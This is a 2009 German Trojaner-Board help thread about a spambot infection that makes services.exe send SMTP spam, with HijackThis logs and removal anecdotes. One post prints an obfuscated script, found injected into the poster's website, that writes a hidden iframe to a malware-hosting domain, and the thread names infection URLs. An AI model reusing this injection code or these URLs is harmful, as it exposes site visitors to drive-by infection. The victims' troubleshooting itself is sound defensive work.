Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Spam-Versand durch services.exe

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 04.07.2009, 17:00   #1
thief1064
 
Spam-Versand durch services.exe - Standard

Spam-Versand durch services.exe



Hallo,

ich habe mir gestern wohl etwas eingefangen:

Gestern beim surfen durchs Internet (mit FF 3.5) kam ich auf eine Seite

VORSICHT! BESSER NICHT KLICKEN!
Code:
ATTFilter
http://www.dennisvoigt.de
         
Auf dieser Seite geht es wohl um deutsche Städtenamen in den USA. Ich klickte auf eine Stadt (ich glaub es war Bamberg, bin mir aber nicht sicher) und öffnete auf dieser Seite einen Link zur Homepage von Bamberg in den USA.

Dann erschlug AntiVir mich mit Virenmeldungen. Welche genau weiß ich nicht mehr. Auf C:\ fanden sich 3 oder 4 neue Dateien, die offenbar automatisch im Hintergrund heruntergeladen wurden. Jedenfalls hatte danach ein paar Prozesse mehr im Taskmanager. Nachdem ich alle beendet hatte und die Meldungen von AntiVir mit "Löschen" bestätigte fühlte ich mich wieder sicher. Vorsichtshalber machte ich einen Virencheck. Keine außergewöhnlichen Funde (nur das übliche: Cookies).

Seit dem ist mein Internet ungewöhnlich langsam. Heute habe ich rausgefunden warum:

Der Systemprozess services.exe verschickt scheinbar spam.

Mit NetLimiter Monitor und netstat -a in der Konsole fand ich heraus, dass der Prozess sich zu verschiednen Rechner aber immer auf Port 25 (SMTP, Postausgangsserver) verbindet.

Ich habe bereits alles mögliche versucht um das Problem zu beheben (Virenscann mit verschiedenen Virenscannern, Hosts-Datei angeguckt, verdächtige Dateien gelöscht, Systemstart + Registrierungsdatenbank durchforstet, etc). Ich konnte leider noch keine Ursache finden.

Auch habe ich hier im Forum einen Thread mit den scheinbar gleichen Problem gefunden (allerdings von 2007 und ohne Lösung):
http://www.trojaner-board.de/42877-s...ickt-spam.html

Hier mein Hijackthis-Log:

Code:
ATTFilter
Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 16:08:20, on 04.07.2009
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16850)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
C:\Programme\Google\Update\GoogleUpdate.exe
C:\Programme\NetLimiter 2 Monitor\nlsvc.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\Programme\NetLimiter 2 Monitor\NLClient.exe
C:\WINDOWS\system32\svchost.exe
C:\Programme\Java\jre6\bin\jusched.exe
C:\Programme\Gemeinsame Dateien\Logitech\G-series Software\LGDCore.exe
C:\WINDOWS\system32\ctfmon.exe
C:\programme\steam\steam.exe
C:\Programme\Pidgin\pidgin.exe
C:\Programme\Logitech\SetPoint\SetPoint.exe
C:\Programme\No-IP\DUC20.exe
C:\Code\Visual Basic\Visual Basic 6\Projekte\LED-Blinker\LED.exe
C:\Programme\Gemeinsame Dateien\Logishrd\KHAL2\KHALMNPR.EXE
C:\Programme\iTunes\iTunes.exe
C:\Programme\Mozilla Firefox 3.5\firefox.exe
C:\Programme\Java\jre6\bin\java.exe
C:\Downloads\HiJackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = h**p://www.google.de/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = h**p://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = h**p://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = h**p://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = h**p://go.microsoft.com/fwlink/?LinkId=69157
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Idea2 SidebarBrowserMonitor Class - {45AD732C-2CE2-4666-B366-B2214AD57A49} - C:\Programme\Desktop Sidebar\sbhelp.dll
O2 - BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre6\bin\ssv.dll
O2 - BHO: Mario Forever Toolbar Helper - {8036D4D7-AAD3-4793-AB49-329E437155A8} - C:\Programme\Mario Forever Toolbar\v2.0.0.3\Mario_Forever_Toolbar.dll
O2 - BHO: IE Developer Toolbar BHO - {CC7E636D-39AA-49b6-B511-65413DA137A1} - C:\Programme\Microsoft\Internet Explorer Developer Toolbar\IEDevToolbar.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O3 - Toolbar: Mario Forever Toolbar - {463DF6D5-BEC1-4d67-B217-59DB692DFC53} - C:\Programme\Mario Forever Toolbar\v2.0.0.3\Mario_Forever_Toolbar.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Programme\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [Launch LGDCore] "C:\Programme\Gemeinsame Dateien\Logitech\G-series Software\LGDCore.exe" /SHOWHIDE
O4 - HKLM\..\Run: [Launch LCDMon] "C:\Programme\Gemeinsame Dateien\Logitech\LCD Manager\lcdmon.exe"
O4 - HKLM\..\Run: [Tweak UI 1.33 deutsch] RUNDLL32.EXE TWEAKUI.CPL,TweakMeUp
O4 - HKLM\..\Run: [Kernel and Hardware Abstraction Layer] KHALMNPR.EXE
O4 - HKLM\..\Run: [avgnt] "C:\Programme\Avira\AntiVir PersonalEdition Classic\avgnt.exe" /min
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Steam] "c:\programme\steam\steam.exe" -silent
O4 - HKCU\..\Run: [Pidgin] C:\Programme\Pidgin\pidgin.exe
O4 - HKUS\.DEFAULT\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - Startup: LED.lnk = C:\Code\Visual Basic\Visual Basic 6\Projekte\LED-Blinker\LED.exe
O4 - Global Startup: Logitech SetPoint.lnk = C:\Programme\Logitech\SetPoint\SetPoint.exe
O4 - Global Startup: No-IP.lnk = C:\Programme\No-IP\DUC20.exe
O8 - Extra context menu item: Nach Microsoft &Excel exportieren - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000
O8 - Extra context menu item: Read with DeskBot - C:\Programme\DeskBot\DeskBot.htm
O9 - Extra button: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra 'Tools' menuitem: Subscribe in Desktop Sidebar - {09FE188B-6E85-479e-9411-51FB2220DF80} - C:\Programme\Desktop Sidebar\sbhelp.dll
O9 - Extra button: IE Developer Toolbar - {48FFE35F-36D9-44bd-A6CC-1D34414EAC0D} - C:\Programme\Microsoft\Internet Explorer Developer Toolbar\IEDevToolbar.dll
O9 - Extra button: Recherchieren - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O10 - Unknown file in Winsock LSP: c:\windows\system32\nwprovau.dll
O16 - DPF: {4871A87A-BFDD-4106-8153-FFDE2BAC2967} (DLM Control) - h**p://dlm.tools.akamai.com/dlmanager/versions/activex/dlm-activex-2.2.4.1.cab
O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} (Shockwave Flash Object) - h**p://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{C92CA073-80CA-4A96-9D82-758D05E57DE2}: NameServer = 192.168.0.1
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O20 - AppInit_DLLs: C:\PROGRA~1\Google\GOOGLE~2\GOEC62~1.DLL
O23 - Service: Avira AntiVir Personal - Free Antivirus Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Intelligenter Hintergrundübertragungsdienst (BITS) - Unknown owner - C:\WINDOWS\
O23 - Service: NetLimiter (nlsvc) - Locktime Software - C:\Programme\NetLimiter 2 Monitor\nlsvc.exe
O23 - Service: Automatische Updates (wuauserv) - Unknown owner - C:\WINDOWS\

--
End of file - 6087 bytes
         
Zudem habe ich noch eine Liste Prozesse inklusive der DLLs, die von services.exe geladen werden:

Code:
ATTFilter
Process list saved on 16:50:05, on 04.07.2009
Platform: Windows XP SP2 (WinNT 5.01.2600)

[pid]	[full path to filename]		[file version]	[company name]
740	C:\WINDOWS\System32\smss.exe		5.1.2600.2180	Microsoft Corporation
820	C:\WINDOWS\system32\winlogon.exe		5.1.2600.2180	Microsoft Corporation
868	C:\WINDOWS\system32\services.exe		5.1.2600.3520	Microsoft Corporation
880	C:\WINDOWS\system32\lsass.exe		5.1.2600.2180	Microsoft Corporation
1048	C:\WINDOWS\system32\svchost.exe		5.1.2600.2180	Microsoft Corporation
1296	C:\WINDOWS\System32\svchost.exe		5.1.2600.2180	Microsoft Corporation
1808	C:\WINDOWS\system32\spoolsv.exe		5.1.2600.2696	Microsoft Corporation
1848	C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe		8.0.0.17	Avira GmbH
636	C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe		8.0.1.30	Avira GmbH
1244	C:\Programme\NetLimiter 2 Monitor\nlsvc.exe		1.0.14.1	Locktime Software
3684	C:\WINDOWS\system32\svchost.exe		5.1.2600.2180	Microsoft Corporation
3848	C:\WINDOWS\Explorer.EXE		6.0.2900.3156	Microsoft Corporation
2572	C:\Programme\NetLimiter 2 Monitor\NLClient.exe		1.0.14.1	Locktime Software
1756	C:\WINDOWS\system32\svchost.exe		5.1.2600.2180	Microsoft Corporation
1144	C:\Programme\Java\jre6\bin\jusched.exe		6.0.110.3	Sun Microsystems, Inc.
2160	C:\Programme\Gemeinsame Dateien\Logitech\G-series Software\LGDCore.exe		1.3.166.0	Logitech Inc.
1664	C:\WINDOWS\system32\ctfmon.exe		5.1.2600.2180	Microsoft Corporation
3404	C:\programme\steam\steam.exe		1.0.0.0	Valve Corporation
508	C:\Programme\Pidgin\pidgin.exe		2.5.8.0	The Pidgin developer community
3284	C:\Programme\Logitech\SetPoint\SetPoint.exe		4.60.122.0	Logitech, Inc.
4072	C:\Programme\No-IP\DUC20.exe		2.2.1.0	Vitalwerks LLC
3144	C:\Code\Visual Basic\Visual Basic 6\Projekte\LED-Blinker\LED.exe		1.0.0.0	n/a
3728	C:\Programme\Gemeinsame Dateien\Logishrd\KHAL2\KHALMNPR.EXE		4.60.42.0	Logitech, Inc.
3408	C:\Programme\iTunes\iTunes.exe		8.0.2.20	Apple Inc.
2592	C:\Programme\Mozilla Firefox 3.5\firefox.exe		1.9.1.3462	Mozilla Corporation
3796	C:\Programme\Java\jre6\bin\java.exe		6.0.110.3	Sun Microsystems, Inc.
3208	C:\WINDOWS\system32\NOTEPAD.EXE		5.1.2600.2180	Microsoft Corporation
2612	C:\Downloads\HiJackThis.exe		2.0.0.2	Trend Micro Inc.


DLLs loaded by process C:\WINDOWS\system32\services.exe:

[full path to filename]		[file version]	[company name]
C:\WINDOWS\system32\ntdll.dll		5.1.2600.3520	Microsoft Corporation
C:\WINDOWS\system32\kernel32.dll		5.1.2600.3541	Microsoft Corporation
C:\WINDOWS\system32\ADVAPI32.dll		5.1.2600.3520	Microsoft Corporation
C:\WINDOWS\system32\RPCRT4.dll		5.1.2600.3555	Microsoft Corporation
C:\WINDOWS\system32\Secur32.dll		5.1.2600.3518	Microsoft Corporation
C:\WINDOWS\system32\msvcrt.dll		7.0.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\NCObjAPI.DLL		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\MSVCP60.dll		6.2.3104.0	Microsoft Corporation
C:\WINDOWS\system32\SCESRV.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\USER32.dll		5.1.2600.3099	Microsoft Corporation
C:\WINDOWS\system32\GDI32.dll		5.1.2600.3466	Microsoft Corporation
C:\WINDOWS\system32\USERENV.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\AUTHZ.dll		5.1.2600.2622	Microsoft Corporation
C:\WINDOWS\system32\umpnpmgr.dll		5.1.2600.2744	Microsoft Corporation
C:\WINDOWS\system32\WINSTA.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\NETAPI32.dll		5.1.2600.3462	Microsoft Corporation
C:\WINDOWS\system32\ShimEng.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\AppPatch\AcGenral.DLL		5.1.2600.2523	Microsoft Corporation
C:\WINDOWS\system32\WINMM.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\ole32.dll		5.1.2600.2726	Microsoft Corporation
C:\WINDOWS\system32\OLEAUT32.dll		5.1.2600.3266	Microsoft Corporation
C:\WINDOWS\system32\MSACM32.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\VERSION.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\SHELL32.dll		6.0.2900.3402	Microsoft Corporation
C:\WINDOWS\system32\SHLWAPI.dll		6.0.2900.3429	Microsoft Corporation
C:\WINDOWS\system32\UxTheme.dll		6.0.2900.2845	Microsoft Corporation
C:\WINDOWS\system32\IMM32.DLL		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\LPK.DLL		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\USP10.dll		1.420.2600.2180	Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.2982_x-ww_ac3f9c03\comctl32.dll		6.0.2900.2982	Microsoft Corporation
C:\WINDOWS\system32\comctl32.dll		5.82.2900.2982	Microsoft Corporation
C:\WINDOWS\system32\Apphelp.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\eventlog.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\WS2_32.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\WS2HELP.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\PSAPI.DLL		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\wtsapi32.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\IMAGEHLP.DLL		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\cryptdll.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\dnsapi.dll		5.1.2600.3394	Microsoft Corporation
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.3352_x-ww_81af8e88\gdiplus.dll		5.1.3102.3352	Microsoft Corporation
C:\WINDOWS\system32\NTMARTA.DLL		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\WLDAP32.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\SAMLIB.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\System32\mswsock.dll		5.1.2600.3394	Microsoft Corporation
C:\WINDOWS\System32\winrnr.dll		5.1.2600.2180	Microsoft Corporation
C:\Programme\Bonjour\mdnsNSP.dll		1.0.5.11	Apple Inc.
C:\WINDOWS\system32\Iphlpapi.dll		5.1.2600.2912	Microsoft Corporation
C:\WINDOWS\system32\rasadhlp.dll		5.1.2600.2938	Microsoft Corporation
C:\WINDOWS\system32\rsaenh.dll		5.1.2600.2161	Microsoft Corporation
C:\WINDOWS\system32\hnetcfg.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\System32\wshtcpip.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\msv1_0.dll		5.1.2600.2180	Microsoft Corporation
C:\WINDOWS\system32\ESENT.dll		5.1.2600.2780	Microsoft Corporation
         
Hier noch ein Screenshot von NetLimiter Monitor:



Ich hoffe jemand weiß rat.

Danke schon mal im Voraus.


UPDATE:

So wie es aussieht handelt es sich um folgenden Trojaner:
Trojan.Win32.Agent.dwg

Jedenfalls hat(te) jemand das gleiche Problem -> http://forum.geizhals.at/t549200,4610963.html#4610963
Allerdings möchte ich nur sehr ungern mein System neuaufsetzen.

Geändert von thief1064 (04.07.2009 um 17:16 Uhr)

Alt 06.07.2009, 21:37   #2
HansWurst2k8
 
Spam-Versand durch services.exe - Standard

Spam-Versand durch services.exe



Hallo,

bekannter von mir hat seit 3 tagen genau das selbe problem aber er war definitiv nicht auf dieser dennisvoigt seite.

diverse viren und malware scanner finden nix auf dem rechner und ich habe sogar alle möglichen prozesse gekillt aber die original microsoft services.exe baut permanent smtp verbindungen auf und verschickt sicherlich reichlich spam.

krieg ich den rechner wieder sauber ohne alles neu zu installieren?


update:

bin schon ein stück weiter hab jetzt ein scanner der was gefunden hat

dr.web CureIT identifiziert datei 62cc46e7.sys im verzeichnis c:\windows\system32\drivers als Trojan.Spambot.4527

hier das virustotal ergebnis
http://www.virustotal.com/de/analisi...141-1246911052

löschen der datei scheint nix zu bringen die is nach kurzer zeit wieder da.



greetz
__________________


Geändert von HansWurst2k8 (06.07.2009 um 22:14 Uhr)

Alt 07.07.2009, 16:13   #3
thief1064
 
Spam-Versand durch services.exe - Standard

!



Hallo,

also ich habe das Problem kurzfristig gelöst, in dem ich die Systemwiederherstellung von Windows XP genutzt habe.
Aber kurze Zeit später trat das Problem wieder auf.

Es gibt eine möglichkeit den Spamversand kurzfristig zu verhindern:

Mit einem Tool, dessen Name mir leider nicht mehr einfällt, konnte ich den Systemprozess services.exe beenden. Kurz nach dem beenden des Prozesses will Windows innerhalb einer Minute automatisch herunterfahren. Dies kann man mit dem Befehl "shutdown -a" in der Konsole abbrechen.
Nachteil der Sache ist, dass einige Programme gar nicht mehr starten (z.b. Firefox), einige sich beim Starten aufhängen und allgemein vorallem Internetanwendungen nicht mehr richtig funktionieren.

Nach einem Neustart sieht alles aber wie vorher aus.

Ich habe festgestellt, dass scheinbar eine Sicherheitslücke in Firefox 3.5 ausgenutzt wird, da ich eine Seite gefunden habe, die den scheinbar gleichen Virus verbreitet:

VORSICHT! WIEDER NICHT KLICKEN!!!
Code:
ATTFilter
http://microsotf.cn
         
Ich habe diese Seite mit dem Firefox Browser geöffent und bekam direkt wieder zig Virenmeldung von AntiVir (die gleichen wie zuvor auch). Es spielte sich das exakt gleiche Szenario wie zuvor ab.
Die Folge war, dass ich schnell neugestartet habe und anschließend eine Systemwiederherstellung gemacht habe. Leider ohne nennenswerten Erfolg.
Der Spamversand ging weiter.

In Opera passiert rein gar nix, wenn ich die oben genannte Seite öffne.

So sah der Code aus, den ich entdeckte:

PHP-Code:
<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e
s
'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\"
wid"+''+'
th=1
he
'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>';
?>

Noch etwas:

Ich habe diese Internetaddresse (s.o.) zufällig als Iframe in einer meiner Webseiten entdeckt. Da der Code garantiert nicht von mir ist, bin ich skeptisch geworden und habe den Link einfach mal aus neugier geöffnet. Ein großer Fehler wie sich herausgestellt ...
Der Virus verbreitet sich scheinbar auch per FTP, da ich mir nicht anders erklären kann wie der Code sonst da rein gekommen ist. Wer weiß wie er sich noch verbreitet.
Ich vermute, dass der Betreiber der Seite von Dennis Voigt ein ähnliches Problem mit dieser geframten Seite hat / hatte und ich mir den Virus so eingefangen habe.

Ich habe jetzt mein System jetzt wieder neu aufgesetzt, da ich keine Lösung gefunden habe.

Ich habe bestimmt 5 Anti-Virenprogramme ausprobiert, aber keins hat den Virus erkannt.

Wenn ich Neuigkeiten habe, melde ich mich wieder.
__________________

Alt 07.07.2009, 17:29   #4
HansWurst2k8
 
Spam-Versand durch services.exe - Standard

Spam-Versand durch services.exe



also ich denke mal ich habs beim bekannten wieder sauber bekommen nachdem CureIT durch war hab ich nochmal asquared free laufen lassen.

im system32\drivers verzeichnis waren noch zwei andere sys dateien mit datum vom anfang diesen monats auf eine von beiden ist virustotal.com nicht angesprungen bei der anderen waren auch einige treffer. nachdem ich die auch gelöscht hatte und den rechner neu gestartet habe war der spamversand vorbei.

ich werde weiter beobachten ...

aber wenn das wirklich so einfach durch den firefox 3.5 eingeschleußt werden kann wär schon krass


greetz

Antwort

Themen zu Spam-Versand durch services.exe
antivir, antivirus, avgnt, avgnt.exe, avira, bho, bonjour, dateien gelöscht, desktop, excel, firefox, google, handel, helper, hijack, homepage, hosts-datei, internet, internet explorer, launch, mozilla, netstat, nicht sicher, no-ip, object, problem, registrierungsdatenbank, scan, secur, software, spam-versand, systemprozess, warum, windows, windows xp



Ähnliche Themen: Spam-Versand durch services.exe


  1. Nach Mailbox-Einbruch massiver Spam-Versand über gefakte Mails
    Überwachung, Datenschutz und Spam - 09.11.2015 (0)
  2. Windows 7: Telekom schickt Mahnung wegen Spam Versand
    Log-Analyse und Auswertung - 12.09.2014 (14)
  3. Nettes Schreiben vom Internetprovider: Spam Versand von meinem Account
    Plagegeister aller Art und deren Bekämpfung - 15.05.2014 (9)
  4. Spam Versand über Outlook (AOL)
    Plagegeister aller Art und deren Bekämpfung - 25.02.2014 (5)
  5. Windows Live Mail - Spam versand ?
    Plagegeister aller Art und deren Bekämpfung - 10.07.2013 (7)
  6. Windows 7 extrem langsam + langsamer Start + Versand von SPAM mails an Kontakte
    Plagegeister aller Art und deren Bekämpfung - 14.04.2013 (26)
  7. Spam-Versand von Gmail-Konto
    Log-Analyse und Auswertung - 14.01.2013 (9)
  8. Telekom Nachricht: Port 25 geschlossen nach Spam Versand
    Plagegeister aller Art und deren Bekämpfung - 16.12.2012 (14)
  9. Versand von SPAM-mails an Adressaten aus meiner Adr-Datei
    Log-Analyse und Auswertung - 16.07.2012 (11)
  10. automatischer Versand von Emails durch gmx
    Log-Analyse und Auswertung - 13.07.2012 (3)
  11. Spam-Versand über gehackte GMX-Konten
    Nachrichten - 10.07.2012 (0)
  12. Hotmail Konto gesperrt nach Spam Mail Versand / Trojaner Verdacht!
    Plagegeister aller Art und deren Bekämpfung - 11.06.2012 (4)
  13. Spam-Versand über meinen Yahoo-Account
    Log-Analyse und Auswertung - 07.05.2012 (27)
  14. Spam-Versand von GMail-Account
    Log-Analyse und Auswertung - 13.05.2011 (21)
  15. Extrem zugemüllter PC, Spam-Versand über gespeicherte Mailadresse
    Log-Analyse und Auswertung - 02.10.2010 (1)
  16. Paladin virus plus auto versand von spam!!!
    Plagegeister aller Art und deren Bekämpfung - 01.03.2010 (3)
  17. ungewollter Versand von SPAM
    Plagegeister aller Art und deren Bekämpfung - 23.01.2006 (3)

Zum Thema Spam-Versand durch services.exe - Hallo, ich habe mir gestern wohl etwas eingefangen: Gestern beim surfen durchs Internet (mit FF 3.5) kam ich auf eine Seite VORSICHT! BESSER NICHT KLICKEN! Code: Alles auswählen Aufklappen ATTFilter - Spam-Versand durch services.exe...
Archiv
Du betrachtest: Spam-Versand durch services.exe auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.